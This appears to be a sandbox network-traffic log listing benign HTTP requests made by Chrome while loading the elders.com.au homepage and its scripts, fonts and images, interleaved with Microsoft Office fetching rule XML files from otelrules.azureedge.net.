      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/el-logo-2.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /react@18/umd/react.development.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /react@18.3.1/umd/react.development.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /react-dom@18/umd/react-dom.development.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /react-dom@18.3.1/umd/react-dom.development.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttf HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Bold.cebc7f85.ttf HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Normal.a1cecbde.ttf HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/find-expert.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /react@18.3.1/umd/react.development.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.0.0-beta3/dist/js/bootstrap.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/Livestock.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/teamwork-icon.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/icon_farm_supplies.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/Livestock.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-977e7ec6e7e29a59f7dfd9cd0ac2f4b3-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
